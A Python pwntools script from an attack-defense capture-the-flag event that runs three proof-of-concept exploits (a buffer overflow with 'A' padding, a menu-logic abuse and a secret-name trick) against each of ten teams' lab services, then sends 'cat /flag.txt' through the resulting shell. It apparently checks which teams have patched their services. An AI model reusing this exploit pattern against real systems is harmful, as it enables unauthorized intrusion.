|
|
- #! /usr/bin/env python2
- # from pwn import context, remote
- from pwn import remote, context
- from multiprocessing import pool
- context.log_level = "error"
-
- HOST = "192.168.2.20"
- TOTAL_TEAMS = 10
- FORMAT = "SlashRootCTF"
-
-
- def poc0(host, port):
- with remote(host, port) as p:
- p.recvuntil(">")
- p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
- msg = p.recvuntil(">")
- # print(msg)
- if "young" in msg:
- p.sendline("y")
- p.recvuntil(">")
- p.sendline("2")
- p.recvuntil(">")
- p.sendline("4")
- p.recvuntil(">")
- p.sendline("y")
- for _ in xrange(10):
- p.recvuntil(">")
- p.sendline("99")
- p.sendline("cat /flag.txt")
- flag = p.recvuntil("}")
- # print flag
- if FORMAT in flag:
- return True
- else:
- return False
- else:
- return False
-
-
- def poc1(host, port):
- with remote(host, port) as p:
- p.recvuntil(">")
- p.sendline("Leo")
- p.recvuntil(">")
- p.sendline("y")
- for _ in range(2):
- p.recvuntil(">")
- p.sendline("3")
- p.recvuntil(">")
- p.sendline("0")
- if "Who" in p.recvuntil(">"):
- return False
- p.sendline("y")
- p.recvuntil(">")
- p.sendline("1")
- p.recvuntil(">")
- p.sendline("4")
- p.recvuntil(">")
- p.sendline("y")
- for _ in range(10):
- p.recvuntil(">")
- p.sendline("99")
- p.sendline("cat /flag.txt")
- flag = p.recvuntil("}")
- if FORMAT in flag:
- return True
- else:
- return False
-
-
- def poc2(host, port):
- with remote(host, port) as p:
- p.recvuntil(">")
- p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__")
- p.recvuntil(">")
- p.sendline("y")
- p.recvuntil(">")
- p.sendline("6")
- if "Lv: 1000000" in p.recvuntil(">"):
- p.sendline("2")
- p.recvuntil(">")
- p.sendline("4")
- p.recvuntil(">")
- p.sendline("y")
- for _ in xrange(10):
- p.recvuntil(">")
- p.sendline("99")
- p.sendline("cat /flag.txt")
- flag = p.recvuntil("}")
- if FORMAT in flag:
- return True
- else:
- return False
- else:
- return False
-
-
- if __name__ == "__main__":
- for i in range(1, TOTAL_TEAMS+1):
- r0 = poc0(HOST, (60004 + (i*100)))
- r1 = poc1(HOST, (60004 + (i*100)))
- r2 = poc2(HOST, (60004 + (i*100)))
- print("Team [%s] %s %s %s" % (i, r0, r1, r2))
|